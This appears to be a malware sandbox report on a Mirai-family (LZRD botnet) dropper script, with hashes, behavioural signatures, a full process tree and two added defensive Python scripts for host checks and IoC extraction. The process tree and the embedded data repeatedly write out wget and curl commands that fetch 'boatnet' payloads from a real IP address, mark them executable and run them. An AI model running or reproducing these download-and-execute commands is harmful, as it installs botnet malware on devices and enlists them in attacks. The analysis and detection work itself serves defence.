Analysis
max time kernel: 59s
max time network: 64s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240508-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 31-08-2024 21:05
Static task
static1

Behavioral tasks (sample ohshit.sh in each)
behavioral1  debian12-armhf-20240418-en
behavioral2  debian12-mipsel-20240729-en
behavioral3  debian9-armhf-20240611-en
behavioral4  debian9-mipsbe-20240611-en
behavioral5  debian9-mipsel-20240611-en
behavioral6  ubuntu1804-amd64-20240508-en  (the environment of this report)
behavioral7  ubuntu2004-amd64-20240729-en
behavioral8  ubuntu2204-amd64-20240611-en
General
Target: ohshit.sh
Size: 2KB
MD5: fefdf2b7ece4d55bd47778b420f84011
SHA1: 2823096e0538910f9b57ff9bae007ec655520fc3
SHA256: 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
SHA512: b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Extracted
Family: mirai
Botnet: LZRD
Signatures

Executes dropped EXE (13 IoCs)
ioc: /tmp/WTF   process: WTF   PIDs: 1525, 1534, 1543, 1552, 1561, 1603, 1613, 1629, 1646, 1671, 1682, 1692, 1703 (one execution per architecture loop in the process tree)

Modifies Watchdog functionality (1 TTP, 26 IoCs)
Mirai-family bots open the hardware watchdog device for writing and disarm it so that the watchdog cannot reboot the infected device; the bot lives only in memory and /tmp, so a reboot would remove it.
description: File opened for modification   ioc: /dev/watchdog        process: WTF   (13 IoCs, one per WTF execution)
description: File opened for modification   ioc: /dev/misc/watchdog   process: WTF   (13 IoCs, one per WTF execution)

YARA rule match: upx
resource: behavioral6/files/fstream-1.dat   yara_rule: upx
The file captured in this run (behavioral6, the environment of this report) matches the UPX packer rule, so expect to unpack it (upx -d, if the UPX header has been left intact) before static analysis.

Enumerates running processes
Discovers information about currently running processes on the system.

Writes file to system bin folder (1 TTP, 26 IoCs)
description: File opened for modification   ioc: /bin/watchdog    process: WTF   (13 IoCs)
description: File opened for modification   ioc: /sbin/watchdog   process: WTF   (13 IoCs)
Both paths are where the userspace watchdog daemon binary normally lives; each WTF execution opens them once, in step with the /dev/watchdog opens above.

Reads runtime system information (64 IoCs)
Reads data from the /proc virtual filesystem: WTF opens /proc/<pid>/status for reading, 64 reads covering 57 distinct PIDs (1065 three times; 467, 497, 1079, 1305 and 1526 twice each): 9, 11, 13, 15, 18, 19, 20, 21, 25, 31, 137, 174, 323, 426, 440, 465, 467, 496, 497, 550, 568, 659, 1042, 1055, 1065, 1079, 1083, 1116, 1132, 1143, 1184, 1265, 1305, 1486, 1514, 1515, 1526, 1528, 1544, 1555, 1566, 1585, 1586, 1596, 1597, 1599, 1604, 1606, 1614, 1618, 1620, 1623, 1637, 1653, 1660, 1666, 1676. This is the process walk behind the "Enumerates running processes" signature above.

Writes file to tmp directory (27 IoCs)
Malware often drops required files in the /tmp directory.
description: File opened for modification   ioc: /tmp/WTF   process: ohshit.sh   (the script itself writes the staged binary; compare the cat stage in the process tree)
description: File opened for modification   ioc: /tmp/boatnet.<arch>   process: wget   for arch in x86_64, mpsl, x86, mips, arm7, m68k, arc, arm6, spc, arm5, ppc, arm (12 IoCs)
description: File opened for modification   ioc: /tmp/boatnet.<arch>   process: curl   for arch in i686, arm6, spc, x86_64, mpsl, arm, x86, mips, arc, i468, arm5, ppc, m68k, arm7 (14 IoCs)
wget was also invoked for boatnet.i468 and boatnet.i686 (PIDs 1547 and 1556 in the process tree) but wrote no file for either, whereas curl -O did. Without --fail, curl saves the response body whatever the HTTP status, so those two files may hold an error page rather than a payload.
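The four behaviours above (an executable run from /tmp, the watchdog device opened for writing, /proc/<pid>/status enumeration, files written to /tmp) translate directly into a host-side check. The script below is an added example and not part of the sandbox report: the file names (/tmp/WTF, /tmp/boatnet.*) and the watchdog device paths come from the report, while the fake /tmp and /proc tree that demo() builds is constructed here so the check can be exercised offline.

```python
"""Host-side check for the Mirai-style indicators in this report.

Added example (not part of the sandbox report). It inspects a filesystem
root for three things the report shows:
  * dropped files in /tmp named WTF or boatnet.<arch>,
  * processes whose executable lives under /tmp (the "./WTF" stage),
  * processes holding /dev/watchdog or /dev/misc/watchdog open.
Run as root against "/" on a real host; demo() runs it against a
constructed fake tree instead so it works offline.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Names taken from the report; other droppers vary them, so extend the pattern.
DROPPED_NAME_RE = re.compile(r"^(WTF|boatnet\.[A-Za-z0-9_]+)$")
WATCHDOG_DEVICES = {"/dev/watchdog", "/dev/misc/watchdog"}


@dataclass
class Findings:
    dropped_files: list = field(default_factory=list)
    tmp_processes: list = field(default_factory=list)     # (pid, exe)
    watchdog_holders: list = field(default_factory=list)  # (pid, device)

    def is_suspicious(self):
        return bool(self.dropped_files or self.tmp_processes or self.watchdog_holders)


def _readlink(path):
    try:
        return os.readlink(path)
    except OSError:  # permission denied, kernel thread, or process already gone
        return None


def _listdir(path):
    try:
        return os.listdir(path)
    except OSError:  # /proc/<pid>/fd of another user's process without root
        return []


def scan(root="/"):
    """Walk <root>/tmp and <root>/proc; returns Findings (empty when clean)."""
    f = Findings()
    tmp_dir = os.path.join(root, "tmp")
    for name in sorted(_listdir(tmp_dir)):
        if DROPPED_NAME_RE.match(name):
            f.dropped_files.append("/tmp/" + name)
    proc_dir = os.path.join(root, "proc")
    pids = sorted((p for p in _listdir(proc_dir) if p.isdigit()), key=int)
    for pid in pids:
        exe = _readlink(os.path.join(proc_dir, pid, "exe"))
        # A bot that unlinks itself shows as "/tmp/WTF (deleted)"; the prefix test still catches it.
        if exe and exe.startswith("/tmp/"):
            f.tmp_processes.append((int(pid), exe))
        fd_dir = os.path.join(proc_dir, pid, "fd")
        for fd in _listdir(fd_dir):
            target = _readlink(os.path.join(fd_dir, fd))
            if target in WATCHDOG_DEVICES:
                f.watchdog_holders.append((int(pid), target))
    return f


def build_demo_tree(root):
    """Constructed fake root mimicking the infected sandbox VM (PIDs from the report)."""
    tmp_dir = os.path.join(root, "tmp")
    os.makedirs(tmp_dir)
    for name in ("WTF", "boatnet.x86", "boatnet.mips", "ohshit.sh", "ssh-L7Ck4WeeJZaz"):
        open(os.path.join(tmp_dir, name), "w").close()
    # PID 1525: the dropped bot running from /tmp with /dev/watchdog open on fd 3.
    bot = os.path.join(root, "proc", "1525")
    os.makedirs(os.path.join(bot, "fd"))
    os.symlink("/tmp/WTF", os.path.join(bot, "exe"))
    os.symlink("/dev/watchdog", os.path.join(bot, "fd", "3"))
    # PID 1517: the dropper script's interpreter, an ordinary system binary.
    sh = os.path.join(root, "proc", "1517")
    os.makedirs(os.path.join(sh, "fd"))
    os.symlink("/bin/dash", os.path.join(sh, "exe"))
    os.symlink("/dev/null", os.path.join(sh, "fd", "0"))


def demo():
    """Run scan() against the constructed tree; returns the Findings."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan(root)


if __name__ == "__main__":
    result = demo()
    print("dropped files:", result.dropped_files)
    print("processes executing from /tmp:", result.tmp_processes)
    print("watchdog device holders:", result.watchdog_holders)
    print("suspicious:", result.is_suspicious())
```

On a live host the /proc checks need root to read other users' exe and fd links; without it the scan silently sees fewer processes, which is why the helper swallows permission errors rather than aborting.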
Processes

Every entry below the first runs at depth 2 under the dropper script (the report's "⤵" depth markers); the script repeats one download, stage, chmod, execute loop per architecture. Each WTF execution carries the same four signatures, abbreviated below as [bot signatures]: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information. "..." in a chmod line stands for the remainder of the /tmp listing shown in full for PID 1524.

/tmp/ohshit.sh  PID 1517  /tmp/ohshit.sh  [Writes file to tmp directory]

  /usr/bin/wget  PID 1518  wget http://94.156.71.225/hiddenbin/boatnet.x86  [Writes file to tmp directory]
  /usr/bin/curl  PID 1519  curl -O http://94.156.71.225/hiddenbin/boatnet.x86  [Writes file to tmp directory]
  /bin/cat       PID 1523  cat boatnet.x86
                 (the script's own write of /tmp/WTF, the signature on PID 1517, is consistent with this cat being redirected into WTF)
  /bin/chmod     PID 1524  chmod +x boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF
                 (the argument list is the sorted contents of /tmp, i.e. the expansion of a shell glob such as chmod +x *, so the sandbox's own temp files are marked executable as well; later chmod invocations repeat this listing with each newly downloaded boatnet.* file added, and from PID 1602 onward the systemd-timedated.service-DsKJWD entry no longer appears)
  /tmp/WTF       PID 1525  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1529  wget http://94.156.71.225/hiddenbin/boatnet.mips  [Writes file to tmp directory]
  /usr/bin/curl  PID 1531  curl -O http://94.156.71.225/hiddenbin/boatnet.mips  [Writes file to tmp directory]
  /bin/chmod     PID 1533  chmod +x boatnet.mips boatnet.x86 ... WTF
  /tmp/WTF       PID 1534  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1538  wget http://94.156.71.225/hiddenbin/boatnet.arc  [Writes file to tmp directory]
  /usr/bin/curl  PID 1540  curl -O http://94.156.71.225/hiddenbin/boatnet.arc  [Writes file to tmp directory]
  /bin/chmod     PID 1542  chmod +x boatnet.arc boatnet.mips boatnet.x86 ... WTF
  /tmp/WTF       PID 1543  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1547  wget http://94.156.71.225/hiddenbin/boatnet.i468  (no file written)
  /usr/bin/curl  PID 1549  curl -O http://94.156.71.225/hiddenbin/boatnet.i468  [Writes file to tmp directory]
  /bin/chmod     PID 1551  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ... WTF
  /tmp/WTF       PID 1552  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1556  wget http://94.156.71.225/hiddenbin/boatnet.i686  (no file written)
  /usr/bin/curl  PID 1558  curl -O http://94.156.71.225/hiddenbin/boatnet.i686  [Writes file to tmp directory]
  /bin/chmod     PID 1560  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ... WTF
  /tmp/WTF       PID 1561  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1565  wget http://94.156.71.225/hiddenbin/boatnet.x86_64  [Writes file to tmp directory]
  /usr/bin/curl  PID 1577  curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64  [Writes file to tmp directory]
  /bin/chmod     PID 1602  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1603  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1607  wget http://94.156.71.225/hiddenbin/boatnet.mpsl  [Writes file to tmp directory]
  /usr/bin/curl  PID 1610  curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl  [Writes file to tmp directory]
  /bin/chmod     PID 1612  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1613  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1617  wget http://94.156.71.225/hiddenbin/boatnet.arm  [Writes file to tmp directory]
  /usr/bin/curl  PID 1619  curl -O http://94.156.71.225/hiddenbin/boatnet.arm  [Writes file to tmp directory]
  /bin/chmod     PID 1628  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1629  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1633  wget http://94.156.71.225/hiddenbin/boatnet.arm5  [Writes file to tmp directory]
  /usr/bin/curl  PID 1637  curl -O http://94.156.71.225/hiddenbin/boatnet.arm5  [Writes file to tmp directory]
  /bin/chmod     PID 1645  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1646  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1650  wget http://94.156.71.225/hiddenbin/boatnet.arm6  [Writes file to tmp directory]
  /usr/bin/curl  PID 1668  curl -O http://94.156.71.225/hiddenbin/boatnet.arm6  [Writes file to tmp directory]
  /bin/chmod     PID 1670  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1671  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1675  wget http://94.156.71.225/hiddenbin/boatnet.arm7  [Writes file to tmp directory]
  /usr/bin/curl  PID 1678  curl -O http://94.156.71.225/hiddenbin/boatnet.arm7  [Writes file to tmp directory]
  /bin/chmod     PID 1681  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1682  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1686  wget http://94.156.71.225/hiddenbin/boatnet.ppc  [Writes file to tmp directory]
  /usr/bin/curl  PID 1688  curl -O http://94.156.71.225/hiddenbin/boatnet.ppc  [Writes file to tmp directory]
  /bin/chmod     PID 1691  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1692  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1697  wget http://94.156.71.225/hiddenbin/boatnet.spc  [Writes file to tmp directory]
  /usr/bin/curl  PID 1699  curl -O http://94.156.71.225/hiddenbin/boatnet.spc  [Writes file to tmp directory]
  /bin/chmod     PID 1702  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ... WTF
  /tmp/WTF       PID 1703  ./WTF  [bot signatures]

  /usr/bin/wget  PID 1707  wget http://94.156.71.225/hiddenbin/boatnet.m68k  [Writes file to tmp directory]
  /usr/bin/curl  PID 1709  curl -O http://94.156.71.225/hiddenbin/boatnet.m68k  [Writes file to tmp directory]
                 (no chmod or WTF execution for this file appears before the tree ends)
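The tree above is the raw material for an IoC list and for a simple check of how far each architecture loop got. The Python below is an added example, not part of the sandbox report: PROCESS_LINES is a constructed transcription of a few of the entries above in a "<pid> <exe> <command line>" form, with the chmod argument lists abbreviated from the full /tmp listing the report shows. It pulls out the download host, URLs, payload names and architectures, the executables run from /tmp, and for each payload the sequence of dropper stages observed after it.

```python
"""Turn the sandbox process tree into IoCs and a per-payload stage chain.

Added example (not part of the sandbox report). PROCESS_LINES is a
constructed transcription of entries from the report's process tree.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

PROCESS_LINES = """\
1517 /tmp/ohshit.sh /tmp/ohshit.sh
1518 /usr/bin/wget wget http://94.156.71.225/hiddenbin/boatnet.x86
1519 /usr/bin/curl curl -O http://94.156.71.225/hiddenbin/boatnet.x86
1523 /bin/cat cat boatnet.x86
1524 /bin/chmod chmod +x boatnet.x86 ohshit.sh WTF
1525 /tmp/WTF ./WTF
1529 /usr/bin/wget wget http://94.156.71.225/hiddenbin/boatnet.mips
1531 /usr/bin/curl curl -O http://94.156.71.225/hiddenbin/boatnet.mips
1533 /bin/chmod chmod +x boatnet.mips boatnet.x86 ohshit.sh WTF
1534 /tmp/WTF ./WTF
1707 /usr/bin/wget wget http://94.156.71.225/hiddenbin/boatnet.m68k
1709 /usr/bin/curl curl -O http://94.156.71.225/hiddenbin/boatnet.m68k
"""

URL_RE = re.compile(r"https?://\S+")


@dataclass
class Proc:
    pid: int
    exe: str
    argv: list


def parse_tree(text):
    """One Proc per non-empty line of "<pid> <exe> <argv...>"."""
    procs = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        procs.append(Proc(int(fields[0]), fields[1], fields[2:]))
    return procs


def _payload_name(url):
    return urlsplit(url).path.rsplit("/", 1)[-1]


def extract_iocs(procs):
    """Hosts, download URLs, payload names and architectures, executables run from /tmp."""
    hosts, urls, payloads, tmp_execs = set(), [], [], []
    for p in procs:
        for arg in p.argv:
            if URL_RE.fullmatch(arg) and arg not in urls:
                urls.append(arg)
                hosts.add(urlsplit(arg).netloc)
                payloads.append(_payload_name(arg))
        if p.exe.startswith("/tmp/") and p.exe not in tmp_execs:
            tmp_execs.append(p.exe)
    # The dropper names each build boatnet.<arch>; the suffix is the targeted architecture.
    archs = [n.split(".", 1)[1] for n in payloads if "." in n]
    return {"hosts": sorted(hosts), "urls": urls, "payloads": payloads,
            "archs": archs, "tmp_execs": tmp_execs}


def stage_chains(procs):
    """Map each payload to the dropper stages seen for it, in order.

    A chain reaching an "exec" stage means the download was staged and run;
    one ending after wget/curl (boatnet.m68k here) means the loop was cut off.
    """
    chains, current = {}, None
    for p in procs:
        tool = p.exe.rsplit("/", 1)[-1]
        if tool in ("wget", "curl"):
            url = next((a for a in p.argv if URL_RE.fullmatch(a)), None)
            if url is None:
                continue
            current = _payload_name(url)
            chains.setdefault(current, []).append(tool)
        elif current is None:
            continue  # nothing downloaded yet (the dropper script itself)
        elif tool == "cat":
            chains[current].append("cat")
        elif tool == "chmod" and "+x" in p.argv:
            chains[current].append("chmod+x")
        elif p.exe.startswith("/tmp/"):
            chains[current].append("exec " + p.exe)
    return chains


if __name__ == "__main__":
    procs = parse_tree(PROCESS_LINES)
    print(extract_iocs(procs))
    for name, chain in stage_chains(procs).items():
        print(name, "->", " > ".join(chain))
```

Feeding the full tree in the same form yields the 14 architecture suffixes the report's "Writes file to tmp directory" signature lists and shows that only the last loop (m68k) stops short of the chmod and exec stages.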
Downloads
Filesize: 36KB
MD5: ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1: 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256: 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512: 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d